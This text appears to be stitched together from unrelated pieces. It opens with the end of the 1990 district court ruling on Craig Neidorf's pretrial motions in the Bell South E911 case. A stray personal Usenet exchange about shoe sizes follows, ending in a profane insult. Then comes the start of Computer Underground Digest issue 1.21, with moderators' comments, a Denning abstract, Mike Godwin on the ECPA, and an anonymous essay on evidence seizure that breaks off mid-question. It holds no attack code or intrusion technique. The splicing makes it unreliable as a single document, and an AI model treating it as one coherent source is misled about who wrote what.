(3d Cir. 1959) (same facts as in LESTER).
Therefore, in the instant case, if the information in Bell South's
E911 text file had been affixed to a floppy disk, or printed out on a
computer printer, then Neidorf's transfer of that information across state
lines would clearly constitute the transfer of "goods, wares, or
merchandise" within the meaning of 2314. This court sees no reason to hold
differently simply because Neidorf stored the information inside computers
instead of printing it out on paper. In either case, the information is in
a transferrable, accessible, even salable form.
Neidorf argues in his brief that a 2314 charge cannot survive when the
"thing" actually transferred never takes tangible form. A few courts have
apparently adopted this position. {Although, contrary to Neidorf's
arguments, neither the Supreme Court's decision in UNITED STATES V.
DOWLING, 473 U.S. 207 (1985), nor the Seventh Circuit's decision in UNITED
STATES V. KENNGOTT, 840 F.2d 375 (7th Cir. 1987), stand for the proposition
that only tangible objects fall within the definition of "goods, wares, or
merchandise" under 2314. The definition of the term "goods, wares, or
merchandise" was not even at issue in either of those cases.} For example,
in UNITED STATES V. SMITH, 686 F.2d 234 (5th Cir. 1982), the court held
that a copyright does not fit within the definition of "goods, wares, or
merchandise" under 2314. The court ruled that in order to come within that
definition, "[t]he 'thing' or 'item' must have some sort of tangible
existence; it must be in the nature of 'personal property or chattels.'"
Id. at 241. Similarly, in BOTTONE, supra, where the court held that copies
of documents describing a manufacturing process for a patented drug
constitute "goods, wares, or merchandise" under 2314, the court opined: "To
be sure, where no tangible objects were ever taken or transported, a court
would be hard pressed to conclude that 'goods' had been stolen and
transported within the meaning of 2314; the statute would presumably not
extend to the case where a carefully guarded secret was memorized, carried
away in the recesses of a thievish mind and placed in writing only after a
[state] boundary had been crossed." 365 F.2d at 393.
Nevertheless, this court is not entirely convinced that tangibility is
an absolute requirement of "goods, wares, or merchandise" under 2314.
Congress enacted 2314 to extend the National Motor Vehicle Theft Act to
cover all stolen property over a certain value ($5000) which is knowingly
transported across state lines. See UNITED STATES V. DOWLING, 473 U.S. 207,
218-20 (1985). In line with this broad congressional intent, courts have
liberally construed the term "goods, wares, or merchandise" as "a general
and comprehensive designation of such personal property and chattels as are
ordinarily the subject of commerce." See UNITED STATES V. WHALEY, 788 F.2d
581, 582 (9th Cir.) (quoting SEAGRAVES, 265 F.2d at 880), CERT. DENIED, 479
U.S. 962 (1986). Reading a tangibility requirement into the definition of
"goods, wares, or merchandise" might unduly restrict the scope of 2314,
especially in this modern technological age. For instance, suppose the
existence of a valuable gas, used as an anesthetic, which is colorless,
odorless, and tasteless -- totally imperceptible to the human senses. If
this gas is stored in a tank in Indiana, and a trucker hooks up to the
tank, releases the valuable gas into a storage tank on his truck, and then
takes the gas to Illinois to sell it for a profit, is there no violation of
2314 simply because the gas is not technically tangible? This court is
reluctant to believe that any court would construe 2314 so narrowly.
In any event, this court need not decide that issue to resolve this
case, for even if tangibility is a requirement of "goods, wares or
merchandise" under 2314, in this court's opinion the computer-stored
business information in this case satisfies that requirement. Although not
printed out on paper, a more conventional form of tangibility, the
information in Bell South's E911 text file was allegedly stored on
computer. Thus, by simply pressing a few buttons, Neidorf could recall that
information from computer storage and view it on his computer terminal. The
information was also accessible to others in the same fashion if they
simply pressed the right buttons on their computer. This ability to access
the information in viewable form from a reliable storage place
differentiates this case from the mere memorization of a formula and makes
this case more similar to cases like GREENWALD, BOTTONE, SEAGRAVES, and
LESTER, where proprietary information was also stored, but in a more
traditional manner -- on paper. The accessibility of the information in
readable form from a particular storage place also makes the information
tangible, transferable, salable and, in this court's opinion, brings it
within the definition of "goods, wares, or merchandise" under 2314.
In order to sustain a charge against Neidorf under 2314, however, the
government cannot simply allege that Neidorf transferred "goods, wares, or
merchandise" across state boundaries; the government must also allege that
Neidorf executed the transfer knowing the goods were "stolen, converted or
taken by fraud." This requirement forms the basis for Neidorf's second
challenge to Counts III and IV. Relying on UNITED STATES V. DOWLING, 473
U.S. 207 (1985), Neidorf maintains that the 2314 charges should be
dismissed because the "things" he allegedly transferred are not the type of
property which is capable of being "stolen, converted or taken by fraud."
In DOWLING, the government charged the defendant with violating 2314
by shipping "bootleg" and "pirated" {A "bootleg" phonorecord is an
unauthorized copy of a commercially unreleased performance. A "pirated"
phonorecord is an unauthorized copy of a performance already commercially
released. DOWLING, 473 U.S. at 205-06 n.2.} phonorecords across state
lines. Id. at 212. The government argued that the shipments came within
2314 because the phonorecords embodied performances of copyrighted musical
compositions which the defendant had no right to distribute. Id. at 214-15.
The Court framed the issue in the case as follows: "Dowling does not
contest that he caused the shipment of goods in interstate commerce, or
that the shipments had sufficient value to meet the monetary requirement.
He argues, instead, that the goods shipped were not 'stolen, converted or
taken by fraud.'" "We must determine, therefore, whether phonorecords that
include the performance of copyrighted musical compositions for the use of
which no authorization has been sought or royalties paid are consequently
'stolen, converted or taken by fraud' for purposes of 2314." Id. at 214-16.
The Court ruled that while the holder of a copyright possesses certain
property rights which are protectible and enforceable under copyright law,
he does not own the type of possessory interest in an item of property
which may be "stolen, converted or taken by fraud." Id. at 216-18. Thus,
the Court held that 2314 does not apply to interstate shipments of
"bootleg" and "pirated" phonorecords whose unauthorized distribution
infringes on valid copyrights. Id. at 228-29.
Neidorf also cites UNITED STATES V. SMITH, 686 F.2d 234 (5th Cir.
1982), to support his argument. Like DOWLING, SMITH held that copyright
infringement is not the equivalent of theft or conversion under 2314. Id.
at 241. The instant case, however, is distinguishable from DOWLING and
SMITH. This case involves the transfer of confidential, proprietary
business information, not copyrights. As DOWLING and SMITH recognized, the
copyright holder owns only a bundle of intangible rights which can be
infringed, but not stolen or converted. The owner of confidential,
proprietary business information, in contrast, possesses something which
has clearly been recognized as an item of PROPERTY. CARPENTER, 108 S.Ct. at
320; KEANE, 852 F.2d at 205. As such, it is certainly capable of being
misappropriated, which, according to the indictment, is exactly what
happened to the information in Bell South's E911 text file.
In his final gasp, Neidorf points out that in DOWLING, the Court based
its ruling partly on the fact that Congress passed the Copyright Act to
deal exclusively with copyright infringements. The Court reasoned that
applying 2314 to the infringement of copyrights would result in an
unnecessary and unwarranted intrusion into an area already governed by the
Copyright Act. 473 U.S. at 221-26. Neidorf makes a similar argument in this
case. He notes that Congress has enacted a statute -- the Computer Fraud
and Abuse Act ("CFAA"), 18 U.S.C. 1030 -- which is specifically designed to
address computer-related crimes, such as unauthorized computer access.
Neidorf claims that the enactment of the CFAA precludes a finding that 2314
reaches his alleged conduct in this case.
The problem with Neidorf's argument, however, is that he does not
cite, and this court is unable to find, anything in the legislative history
of the CFAA which suggests that the statute was intended to be the
exclusive law governing computer-related crimes, or that its enactment
precludes the application of other criminal statutes to computer-related
conduct. Therefore, the court rejects Neidorf's claim that applying 2314 to
the instant case would undermine the Congressional intent behind the CFAA.
Similarly, the court rejects Neidorf's bald assertion that the legislative
history behind 2314 supports his argument. Nothing in the legislative
history of 2314 prevents the court from finding that the information in
Bell South's E911 text file was "stolen, converted or taken by fraud" as
that term is used in 2314. Accordingly, Neidorf's motion to dismiss Counts
III and IV is denied.
C. Motion to Strike Surplusage and Prejudicial Material
Pursuant to Rule 7(d) of the Federal Rules of Criminal Procedure,
Neidorf moves to strike certain words and phrases from the indictment which
he claims are unnecessary and prejudicial. He first argues that the terms
"hackers" and "computer hackers" should be stricken because those terms are
likely to cause confusion and prejudice. He contends that the government
uses those terms in the indictment to lure the jury into predetermining his
character and motives.
The court, however, is not convinced that the government's use of the
term "hacker" in this case is unduly prejudicial. The government has
specifically defined "hackers" in the indictment as "individuals involved
with the unauthorized access of computer systems by various means." This
definition is consistent with WEBSTER'S II NEW RIVERSIDE UNIVERSITY
DICTIONARY (1984), which defines hacker as follows: "SLANG. One who gains
unauthorized, usu[ally] non-fraudulent access to another's computer
system." Id. at 557. The term "hackers" has also been understood to
encompass both those who obtain unauthorized access to computer systems and
those who simply enjoy using computers and experimenting with their
capabilities as "innocent" hobbyists. See Staff of the Subcomm. on
Transportation, Aviation & Materials of the House Comm. on Science &
Technology, 98th Cong., 2d Sess., Report on Computer & Communications
Security & Privacy 17 (Comm. Print 1984) (citing the testimony of Donn B.
Parker, Senior Management Systems Consultant, SRI International, Computer
Research Institute, wherein he stated, "Computer hackers are hobbyists with
intense interest in exploring the capabilities of computers and
communications and causing these systems to perform to their limits. . . .
Hackers exhibit a spectrum of behavior from benign to malicious."); see
also C. Stoll, THE CUCKOO'S EGG, at 10 (1989) ("The word hacker has two
very different meanings. The people I knew who called themselves hackers
were software wizards who . . . knew all the nooks and crannies of the
operating system. . . . But in common usage, a hacker is someone who breaks
into computers"). However, as pointed out in THE CUCKOO'S EGG, and as is
evident from a review of the modern articles using the term, the definition
set forth in the indictment is the one most commonly employed.
The court finds that the use of the term "hackers" in the indictment
does not unduly prejudice Neidorf; it is simply a succinct method of
describing the alleged activities of the persons with whom Neidorf was
associated during the time period charged in the indictment. The term is
both relevant and material, and, contrary to Neidorf's claim that it will
cause confusion, the term is likely to be somewhat helpful to the jury in
understanding the charges in this case. Thus, the court refuses to strike
the term "hackers" from the indictment. See UNITED STATES V.
CHAVERRA-CARDONA, 667 F. Supp. 609, 611 (N.D. Ill. 1987) (information
relevant to the charges and helpful to the jury's understanding of those
charges should not be stricken from an indictment).
Neidorf also claims that references to the "Legion of Doom," a
computer hacker group, should be deleted from the indictment. Neidorf,
however, allegedly had close ties to the Legion of Doom and disseminated
the E911 text file to some of its members. Therefore, references to the
Legion of Doom are highly relevant to the charges in this case. Neidorf
claims the name "Legion of Doom" "invites images of cult worshippers,
satanism, terrorism or black magic," but this is a gross exaggeration of
the potential effect of the term. The indictment clearly sets forth the
purposes and activities of the group, none of which include the slightest
reference to any type of satanism or the like. Thus, there is no reason to
strike references to the "Legion of Doom."
Neidorf further contends that the court should strike the following
portions of the indictment: (1) the second sentence of paragraph 8, which
reads: "The Lockport [computer bulletin board system] was also used by
computer hackers as a location for exchanging and developing software tools
for computer intrusion, and for receiving and distributing hacker tutorials
and other information." (2) the underlined <capitalized here> words in
paragraph 21, which reads: "It was further part of the scheme that the
defendants Riggs and Neidorf would publish information to other computer
HACKERS WHICH COULD BE USED TO GAIN UNAUTHORIZED ACCESS TO EMERGENCY 911
COMPUTER SYSTEMS IN THE UNITED STATES AND THEREBY DISRUPT OR HALT 911
SERVICE IN PORTIONS OF THE UNITED STATES." and (3) the underlined
<capitalized here> parts of paragraph 3, which reads in part: "The E911
Practice was a HIGHLY proprietary AND CLOSELY HELD computerized text file
belonging to the Bell South Telephone Company and stored on the company's
AIMSX computer in Atlanta, Georgia. The E911 Practice described the
computerized control and maintenance of the E911 system and CARRIED WARNING
NOTICES THAT IT WAS NOT TO BE DISCLOSED OUTSIDE BELL SOUTH OR ANY OF ITS
SUBSIDIARIES EXCEPT UNDER WRITTEN AGREEMENT." Each of these allegations,
however, are directly relevant to Neidorf's knowledge of the proprietary,
confidential nature of the information in Bell South's E911 file and to
Neidorf's motive and ability to aid in the misappropriation of that
information. Therefore, those allegations are pertinent to the elements of
the offenses charged and are not properly stricken. Neidorf's motion to
strike is accordingly denied.
D. Motion For A Santiago Hearing
In order to offer the statements of a defendant's alleged
co-conspirators into evidence against the defendant pursuant to Fed. R.
Evid. 801(d)(2)(E), the government must make a preliminary showing, by a
preponderance of the evidence, that: (1) a conspiracy existed; (2) the
defendant and the declarant were members of the conspiracy when the
statements were made; and (3) the statements were made during the course of
and in furtherance of the conspiracy. BOURJAILY V. UNITED STATES, 483 U.S.
171 (1989); UNITED STATES V. SANTIAGO, 582 F.2d 1128, 1135 (7th Cir. 1978).
Neidorf has moved for an order requiring the government to file a statement
setting forth its evidence in support of each of the above factors. The
government, however, filed a SANTIAGO proffer subsequent to Neidorf's
motion. Therefore, Neidorf's motion for a SANTIAGO proffer is denied as
moot. Moreover, after reviewing the government's case as detailed in its
proffer, the court finds that the government has set forth sufficient
evidence to support a preliminary finding of the admissibility of the
statements of Neidorf's alleged co-conspirators. Therefore, this court will
conditionally admit those statements, offered pursuant to Rule
801(d)(2)(E), subject to proof by a preponderance of the evidence at trial
that the SANTIAGO factors are satisfied.
E. Motion For Discovery and Disclosure
In this motion, Neidorf asks the court to issue an order requiring the
government to comply with seven specific discovery requests, which Neidorf
labels A-G. In large part, Neidorf's motion is moot. The government
responds that it has already complied with each of Neidorf's requests, or
will soon turn over the information sought, with only one exception -- the
government objects to request "F." In that request, Neidorf seeks evidence
of specific instances of misconduct which the government plans to offer for
impeachment purposes.
The court finds that the government's refusal to comply with request
"F" is justified, since the government has no obligation to turn over the
impeachment evidence sought in that request. See UNITED STATES V. BRAXTON,
877 F.2d 556, 560 (7th Cir. 1989). Accordingly, Neidorf's motion for
discovery and disclosure is denied.
F. Motion For Immediate Disclosure of Favorable Evidence
Pursuant to BRADY V. MARYLAND, 373 U.S. 83 (1963), and GIGLIO V.
UNITED STATES, 405 U.S. 150 (1972), Neidorf moves for an order requiring
the government to disclose all evidence of which the government is aware
that is favorable to him. Neidorf has made specific BRADY and GIGLIO
requests, which he has numbered 1-11.
The government responds that it has complied and will continue to
comply with its obligation to turn over exculpatory evidence pursuant to
BRADY. However, the government has objected to Neidorf's Request No. 1,
which seeks any information the government has regarding "any person whose
testimony would be favorable to defendant in any way." The court agrees
with the government that this request is too overbroad to fall within the
scope of BRADY. See UNITED STATES V. ROBINSON, 585 P.2d 274, 281 (7th Cir.
1978), CERT. DENIED, 441 U.S. 947 (1979). Therefore, the government's
objection to that request is valid.
Neidorf acknowledges that the remainder of his requests seek material
pursuant to GIGLIO. In Request No. 2, Neidorf seeks the statements of
individuals which would contradict the testimony of any government
witnesses, regardless of whether the government intends to call the
individuals as witnesses. To the extent such information is not within the
scope of BRADY, however, it is not discoverable. See UNITED STATES V.
MARQUEZ, 686 F.Supp. 1354, 1358 (N.D. Ill. 1988); see also UNITED STATES V.
COLE, 453 F.2d 902, 904 (8th Cir.), CERT. DENIED, 406 U.S. 922 (1972).
Therefore, the government's objection to Request No. 2 is justified.
In Request No. 3, Neidorf seeks immediate disclosure of any
documentary evidence which contradicts or is inconsistent with the expected
testimony of any government witness. The government has objected to this
request only to the extent that it demands such information immediately.
This objection is clearly reasonable, since there is no requirement that
GIGLIO material be produced well in advance of trial. See UNITED STATES V.
WILLIAMS, 738 F.2d 172, 178 (7th Cir. 1984).
Requests Nos. 4 and 5 seek "the name, address, and statement . . . of
any individual who has been interviewed by the government who had knowledge
of the activity alleged in the indictment" and "any and all books, papers,
records, or documents which contain evidence favorable to defendant."
Request 11 seeks "any illegal or unauthorized activity engaged in by
government agents in connection with this indictment or related activity."
The court agrees with the government that these requests are too vague and
overbroad to fall within BRADY or GIGLIO. See ROBINSON, 585 F.2d at 281.
Finally, the government objects to Requests 6-10 only to the extent
that Neidorf seeks the material set forth in those requests immediately. As
noted above, nothing requires the government to turn over GIGLIO evidence
well in advance of trial. Accordingly, Neidorf's motion for immediate
disclosure of favorable evidence is denied.
G. Motion For Pretrial Production of Jencks Material
Neidorf's final motion requests the court to order the government to
produce material pursuant to the Jencks Act, 18 U.S.C. 3500, thirty or
sixty days prior to trial. {Curiously, the first sentence of Neidorf's
motion asks for production thirty days prior to trial, while the last
sentence of the motion asks for production sixty days prior to trial.} By
its express terms, the Jencks Act generally does not provide the defendant
with an opportunity to obtain the statements of a government witness until
after the witness has testified on direct examination. 18 U.S.C. 3500(a).
Neidorf, however, claims that he will not be able to adequately use the
Jencks material unless it is provided to him in advance of trial.
Therefore, he maintains that pretrial production of the Jencks material is
required in order to afford him his rights to due process of law and to
effective assistance of counsel.
In some cases, courts have held that pretrial production of Jencks
materials is required in order to avoid long delays during trial and to
provide the defendant with ample opportunity to review the material and
make appropriate use of it. See, e.g., UNITED STATES V. HOLMES, 722 F.2d
37, 40-41 (4th Cir. 1983); UNITED STATES V. NARCISCO, 446 F.Supp. 252, 271
(E.D. Mich. 1976). Those cases, however, are rare. They generally involve
an overwhelming volume of Jencks material of a particularly complex nature.
There is no indication that this case involves that type of complexity or
volume. The court will assure that Neidorf's counsel has sufficient
opportunity to review the Jencks material to be able to make substantive
use of it, and the court is confident that providing Neidorf's counsel with
that opportunity will not produce inordinate delays during trial.
Therefore, Neidorf's constitutional rights to due process and effective
assistance of counsel will not be implicated by the government's production
of Jencks material at trial. Neidorf's motion for early production of that
material is accordingly denied.
CONCLUSION
For the foregoing reasons, Neidorf's pretrial motions are denied,
except for his motion to dismiss Counts V-VII and his motion for a bill of
particulars, which are held in abeyance pending the filing of the
superseding indictment.
IT IS SO ORDERED.
___________________________________
Nicholas J. Bua
Judge, United States District Court
Dated: June 5, 1990
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
+ END THIS FILE +
+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+===+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=
!
--
Si
Brian Grant
Jennifer Martino wrote:
>
> Brian Grant wrote:
> >
> > Jennifer Martino wrote:
> > >
> >
> > > > >
> > > > > 1. What's your shoe size?
> > >
> > > haha.. what does it matter since I am not male? =)
> > >
> > AHAH, you have obviously been taking question answering lessons from
> > somebody.
>
> Argh.. I resent that remark. =)
> --
Well, it did avoid an answer. BTW, I would never ask a lady her shoe
size or age.
Jennifer Martino
Brian Grant wrote:
>
> Jennifer Martino wrote:
> >
> > Brian Grant wrote:
> > >
> > > Jennifer Martino wrote:
> > > >
> > >
> > > > > >
> > > > > > 1. What's your shoe size?
> > > >
> > > > haha.. what does it matter since I am not male? =)
> > > >
> > > AHAH, you have obviously been taking question answering lessons from
> > > somebody.
> >
> > Argh.. I resent that remark. =)
> > --
>
> Well, it did avoid an answer.
haha... But I "respect" you Brian enough not to answer you. You see, I
am here to help the newbies, not answer questions that will incriminate
me.
> BTW, I would never ask a lady her shoe
> size or age.
haha.. Good words to live by.
Si_Druid
dear boy: Fuck you. You contribute to the noise. You post nothing useful.
Thus, your voice is worthless.
--
****************************************************************************
>C O M P U T E R U N D E R G R O U N D<
>D I G E S T<
*** Volume 1, Issue #1.21 (July 8, 1990) **
****************************************************************************
MODERATORS: Jim Thomas / Gordon Meyer
ARCHIVISTS: Bob Krause / Alex Smith
REPLY TO: TK0...@NIU.bitnet
COMPUTER UNDERGROUND DIGEST is an open forum dedicated to sharing
information among computerists and to the presentation and debate of
diverse views.
--------------------------------------------------------------------
DISCLAIMER: The views represented herein do not necessarily represent the
views of the moderators. Contributors assume all responsibility
for assuring that articles submitted do not violate copyright
protections.
--------------------------------------------------------------------
File 1: Moderators' Comments
File 2: From the Mailbag
File 3: On the Problems of Evidence in Computer Investigation
File 4: Response to Mitch Kapors Critics (E. Goldstein)
File 5: The CU in the News: Excerpts from Computerworld article
--------------------------------------------------------------------
***************************************************************
*** CuD #1.21, File 1 of 5: Moderators' Comments ***
***************************************************************
----------
In this file:
1) The CU and Freedom of Speech
2) CuD's readership (and survey request)
3) New archive policy
-----------------------------
FREEDOM OF SPEECH AND THE CU
-----------------------------
The moderators and most contributors have consistently criticized federal
agents' investigation and prosecution of the computer underground because
of its chilling effect on free speech and what we see as dangerous and
unacceptable encroachments on the First Amendment. We find any constraints
on the freedom to express ideas (including art, information sharing, or
political views) improper. It is not without some irony that we sense
another barrier to free exchange of ideas.
The author a file below (File 3) requested anonymity because s/he has
experienced harassment in the past from those who object to the content of
those ideas. In this case, the harassment included disruptive early morning
phone calls and other breaches that exceeded the bounds of even prankish
incivility. If the author's experiences were isolated, they would require
little comment. Unfortunately, those of us who identify with the CU can be
an aggressive and self-righteous lot, and we receive a number of complaints
by CU critics of a variety of intrusions on their life that, if the
positions were reversed, we would enrage us.
The climate of fear that limits exchange of information and ideas seems to
be a two-edged sword. Both critics and advocates seem unwilling to express
themselves openly for fear of retaliation. When a single voice is silenced
through fear, we all suffer. Most CU types recognize this, but, if lines
between "them" and "us" (whoever constitutes each side) become sharper, if
passions increase without a productive outlet, and as we come to feel more
threatened by each other, we begin to re-create the conditions that most of
us are struggling to eliminate. Freedom of speech simply cannot exist in a
climate of distrust.
We recognize the bulk of the readers of CuD are professionals and would
not themselves intentionally stifle the right of another to speak. But,
perhaps we are not doing enough to remove the barriers that seem to exist
between various groups. As young computerists enter the modem/CU culture,
the more experienced among us can continually remind users through message
logs, hotline communiques, papers, articles, and other forums, that
retaliation for simply voicing unpopular ideas is wrong. Flamez are one
thing, but accessing accounts, phone threats, actions that disrupt family
life, and similar reactions cannot be tolerated. We find it sad that we
feel it necessary to take a position on this, but the comments of would-be
contributors indicate that there is a problem, and we should be sure our
own house is in order if we intend to maintain credibility.
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
-------------------------------
WHO READS CuD? (IMPORTANT: PLEASE READ)
-------------------------------
Some readers indicate that one reason they do not submit articles to us is
because of the impression that CuD's readers are hackers, young, and
perhaps irresponsible, and the message would be lost. These people are
surprised when we give them a sense of the demographics. We do not keep
records (other than the mailing list and back issues), but over the months
we have gather a rough profile of subscribers from mailing addresses and
responses. We assume here that the characteristics of those who do not
respond or others give no cue of who they are or what they think are
randomly distributed.
**NOW--HERE'S THE IMPORTANT PART**:
Bob Krause, who helps with many of the CuD duties, would like to do a
survey of the readership. But, before sending out a survey to the readers,
we would like some feedback. If people find e-mail surveys offensive, they
can simply delete them. We are more concerned with what people think of the
propriety of it. It would be short (3 minutes to complete), and we agree
with Bob that the information could be helpful. Bob is a computer
applications programmer in upstate New York, and is also a graduate student
interested in computer security.
We feel bob has several good reasons that justify his project.
1. His primary reason is to establish some floor-base figures, from CuD and
other sources, to examine the demographics of the "computer underground."
It would be useful to show the readers who "they" are on the list and also
display that those on the list are not all criminally insane teenagers lead
by a dangerous 60's-type moderator.
2. A survey limited to CuD readers would give us a better sense of the
readership so we can assure ambivalent readers that they are in the
majority.
3. Bob's goal is to eventually gather sufficient data for a paper on the
composition of the CU that would be appropriate for the National Computer
Security Conference in 1991.
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
-------------
ARCHIVES
-------------
With regret, we are NO LONGER ABLE to send archives from the TK0JUT2@NIU
site, and we request that readers obtain them FTP or from Bob Krause. We
are under no pressure of any kind to stop, nor is our decision the result
of the "chilling effect." The problem is time: JT is getting nasty "why
isn't your book" finished notes from the publisher, and GM's commute
between Chicago and the suburbs leaves little spare time.
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
+ END THIS FILE +
+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+===+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=
***************************************************************
*** CuD #1.21, File 2 of 5: From the Mailbag ***
***************************************************************
In this file: 1) Dorothy Denning's paper on hackers
2) Legal info on the ECPA from Mike Godwin
--------------------------------------------------------------------
Date: 25 Jun 1990 1021-PDT (Monday)
To: tk0jut2%niu.b...@uicvm.uic.edu
Cc: denning, 72307...@compuserve.com
Subject: Paper on Hackers
The following is the title and abstract of a paper that I will be
presenting at the 13th National Computer Security Conference in Washington,
D.C., Oct. 1-4, 1990. A copy of the full paper can be obtained from me or
the CuD archives.
Concerning Hackers Who Break into Computer Systems
A diffuse group of people often called %%hackers'' has been
characterized as unethical, irresponsible, and a serious danger to
society for actions related to breaking into computer systems. This
paper attempts to construct a picture of hackers, their concerns, and
the discourse in which hacking takes place. My initial findings suggest
that hackers are learners and explorers who want to help rather than
cause damage, and who often have very high standards of behavior. My
findings also suggest that the discourse surrounding hacking belongs at
the very least to the gray areas between larger conflicts that we are
experiencing at every level of society and business in an information
age where many are not computer literate. These conflicts are between
the idea that information cannot be owned and the idea that it can, and
between law enforcement and the First and Fourth Amendments. Hackers
have raised serious issues about values and practices in an information
society. Based on my findings, I recommend that we work closely with
hackers, and suggest several actions that might be taken.
Dorothy Denning, Digital Equipment Corp., den...@src.dec.com
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Date: Fri, 6 Jul 90 15:09:33 -0500
From: mnem...@ccwf.cc.utexas.edu(Mike Godwin)
Subject: The Electronic Communications Privacy Act
John, you asked whether 18 USC 1343 comprised all or part of the Electronic
Communications Privacy Act. I've already sent you one reply, but I meant to
add that the Act you're asking about is set out in 18 USC 2701 et seq.
The first thing I noticed (which is to say, the first thing I looked for)
was the penalties subsection, which lists penalties that are generally much
less than those available under the wire-fraud statute, 18 USC 1343.
So, one wonders, why isn't the government prosecuting the Legion of Doom
under Secs. 2701 et seq. rather than under 1343? I have some speculations
on this issue:
a) The ECPA protects explicitly protects "communications," which probably
excludes source code and which arguably excludes the E911 "help file"
(since it wasn't written to be communicated via e-mail). So, the feds have
a colorable argument that these statutes weren't intended to deal with
"hacking" at all.
b) By characterizing the LoD activities as theft and fraud rather than
merely as invasion of privacy, the government gets to threaten far more
serious penalties, making the whole sting operation more media-worthy. The
more media coverage of a major show trial, the more deterrent effect on
hackers, the feds may think.
c) Prosecution for more serious crimes is politically necessary for the
government to justify the resources it devoted to the Legion of Doom sting
and other investigations/prosecutions. Only four arrests as of John
Schwartz's last NEWSWEEK article.
FYI, the first-offense penalties for unauthorized access to "stored
communications" under 18 USC 2701 are a maximum of one year in prison and
$250,000 in fines if the access was sought for commercial or destructive
purposes, and a maximum of six months in prison and $5000 in fines "in any
other case."
--Mike
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
+ END THIS FILE +
+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+===+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=
***************************************************************
*** CuD #1.21, File 3 of 5: On the Problems of Evidence ***
***************************************************************
Please post this without attribution to me (anonymously). I've gotten
too much hate mail and nuisance phone calls from hackers to want more,
and from the postings I've seen here, that type of person may be the
majority of your audience.
-------------------------------------------------------------------
Following are various random thoughts and reactions of a retired
semi-hacker to things that have appeared in the digest of late:
1) Quoting the maximum possible penalty for various crimes is not "fair" in
the sense that those maximum sentences are seldom imposed. Saying that the
LoD folks, with no prior record, and (apparently) minimal or no damage
caused, are going to face 50 years in prison, is an attempt to incite the
reader. Most of those laws specify a range of penalties that reflect the
severity of the crime. For instance, Robert Morris (who did more damage
than the LoD folks, as near as I can tell) only got a token fine and a
probated sentence. If the LoD folks even get convicted (doubtful, I would
guess), then their sentence cannot possibly be the maximum. Federal
sentencing guidelines would not allow it, and no judicial review would
uphold it.
The extreme penalties are in place for extreme crimes. If someone mucked
about with a computer and caused multiple deaths, or crashed the FedWire
computers for a half day -- that would be more deserving of a major
sentence.
The law is written to cover a range. Let's try to be more realistic about
this aspect of things, okay?
2) Confiscation of equipment during search warrants. Well, how would YOU
do it? Pretend you are a Federal agent. Figure that you have to search for
evidence of wrong-doing on the computer system of someone who you (rightly
or wrongly) suspect has been involved in illegal computer activity.
Let's leave behind the question of whether the search warrants of late are
justified or not, or whether the agents involved have been overzealous. It
doesn't matter for this little exercise. Instead, put yourself in the role
of the person who has sufficient reason so suspect someone of a crime that
it is your duty to investigate. You need to be thorough, and find the
evidence if it is there. You are a Fed with a valid, fair search warrant.
Consider some of the problems:
* There may be gigabytes of information on disks, tapes, and optical
media that has to be searched, file by file.
* You also have to search the "free list" where files may have been
deleted, because sometimes evidence is found there. You need to do this on
every disk, using something like Norton Utilities.
* You may have to try to decrypt some files, or figure out what
format they use.
* Some evidence may be hidden in other ways on the machine (use your
imagination a little here -- I'm sure you can think of some ways to do it).
You have to search it out.
You've only got one or two people to search the machine, but those persons
are also assigned to a dozen other cases. Could you do a comprehensive
search in a few days? A week? To do an effective search of that much
material would probably take many, many weeks. And remember, the person
whose equipment you are searching is somewhat (or very) knowledgeable, and
has probably tried to hide the information in some way, so you have to work
extra hard to search. Sure they're bitching and moaning about how they
can't continue their business without their equipment, but what can *you*
do about it if you are going to do your job right?
Then there are other problems:
* The machine you are searching may have non-standard hardware and
software. You can't just transfer the disks to another machine and read
them. If nothing else, the heads may be out of alignment on the suspect's
machine, making the disks unreadable anywhere else.
* The machines you are searching may require special peripherals to
print/run/read data. Your system doesn't have an optical disk, or 8mm tape
unit, or maybe even a 3.25 disk drive.
* You have a small budget for equipment and don't have anything big
enough or fast enough to search the data created by complex machines being
searched.
* You don't have the budget or time to make copies of all the data and
take the data with you (even in bulk quantities and high speed, how much
would it take for you to copy 500Mb onto floppies?)
* Because of chain of custody requirements for the search, you have to
be able to certify that the evidence was under the control of responsible
people the whole time from the execution of the warrant up until the
introduction of trial. That means you can't go home for the night, then
come back the next day.
* You can't ask the suspect to help -- he may have function keys,
booby-traps, or other things in place to erase or alter the evidence you're
after. You can't let him near the system, or even near anything that might
signal to the system.
How do you address these issues? By taking the whole set of equipment
involved in the search and using it to do the searching and printing. You
know it is compatible with the data you are searching, and it probably has
sufficient capacity to do the search.
Suppose you find incriminating evidence, or at least material that needs to
be presented as evidence. What do you do? Well, you can't just print it
out or make a floppy copy and then hand the machine back. There is a
concept of "best evidence" involved that means you probably need the
original form. Plus, naive jurors have a hard time relating the data, the
original computer, and copies of the data; defense lawyers like to
capitalize on that. Take a copy into court, and an ignorant judge might
rule that it can't be used in evidence.
How to address the problem? Keep the machine and storage until after the
trial.
It is very easy for people to criticize the law enforcement personnel for
their searches. Perhaps they *should* be criticized for their selection of
suspects and their flair for dramatics, in some (many?) cases. But if you
are going to criticize, then come up with a *reasonable* alternative that
can be used.
I originally thought that seizure of the equipment was too extreme, but the
more I thought about the problem, the more I realized that in many cases
the authorities have no choice if they are to do a thorough and useful
search. I know that if someone wanted to search my systems, it would take
them weeks. Heck, I have so much stuff on disk and tape, it sometimes
takes me more than a day to find what I want, and I'm the one who organized
it all!
3) Prosecution, etc.
Suppose you have evidence that someone had broken into the computers at
Bank XYZ and made copies of a few harmless files. What do you do?
